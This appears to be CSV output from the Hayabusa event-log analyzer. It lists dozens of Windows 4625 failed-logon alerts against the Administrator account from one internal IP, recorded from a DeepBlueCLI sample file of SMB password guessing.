2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ODkwHD0dwGaWhVH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5bPQ5GsX1UUXA6ws | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bvRQ0dVaLawXoo2O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BjxwDdOYBDDSJGun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: czlTDa1F6edSUBdy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mrtgv5HAqRuelEvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfny9Y4SGRZTUXi7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hdhoRgnyj4JPpN2j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K4Qclkpq5ZMKmdCB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0GdZSrcqmfGBfAVy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XA7eJrFopzOb3YQS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2XoSwawv7Ji26GQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 637CaCAc9u7z99X7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Y6Pww45qxQjrZ0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5CPU20SF5i6Cdq34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HAdaPDVTws6TObvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KUCoisntgbX7Mnis | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MFN0b769jRyDxyAW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HKr2OCyezvSEsHBZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QN3snXM4mwhauvvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1VpvQgnwXVxRY1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5bsnUZjpHrbD6kN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hpL2QnQ0kKqU40a6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rpkpNfeTsOeXEsJ0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5mBhuTFm02IjipEw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yZ908ZOCkSBC7tms | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8l7Bct5nMTZHd5mK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRk6e7SrInMDsdMV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhGByctTcM7NXGtB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BgzhW3Pd5JAB8j4f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GZOm1J5kdItrQpGL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DK77Hylw8CJHVGvb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pf7DQVQY7AowT8NY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4us3HR9jseQWIHt8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhJRmgooz8CXjB6E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LkjIXxAvEDrPFUpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ENc8aqouBangyUrU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7flMdluc8YRhOuzn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8WFqeMJIXGDjDP0a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iKeRDzfuDCJSv4Wh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gNEYkgBoG8rAE6SP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vyy1aBvh6lJBs5M5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyhiWNroUS5X5AEh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xg9rUUIwEfujwCvq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zfvpeyTKc3YYkVkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJGR6CYKLUJp2fWl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cmSap0AJZq0KMRBV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnVCbq1IYZF19oYR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aVaDMa2uNXTZNcBj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ymf6Fhv5ieWwcq73 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CT6YMlX1GqeEuAHl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FDJ1IFpMNQ2Euhyn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EGTzqnHJIiZdSgNk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: epSckAKbAp8qag89 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NNC8ilAuznKPwFvV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wObt647cIBPiVaZi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nYDe1L7NNxDGQ0Vt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mXroClxv7B0aCTYv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kCVah2QOH1hMSV76 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2HjD65Xy4Hppim2l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwmEQxC4iTcF4aFu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q3QxOH7ok8RR068t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dJFj6Ckw1HdK9w52 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qqu3Im4HXQNyGnYm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bk5dmjQDnpSlREum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pk4BvYgXBR2whf80 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i6n1su2TUr7ONQr4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: givsEAGfG0smN9Re | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i2YuM0i7a2QuY7xb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xuocQPZpd91adY0E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PvGB1dZrfDWyZoqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w4oi8iL88rJo7g2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cF3OUnytXi4NjvqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WKkJcp3TYj31iJUM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
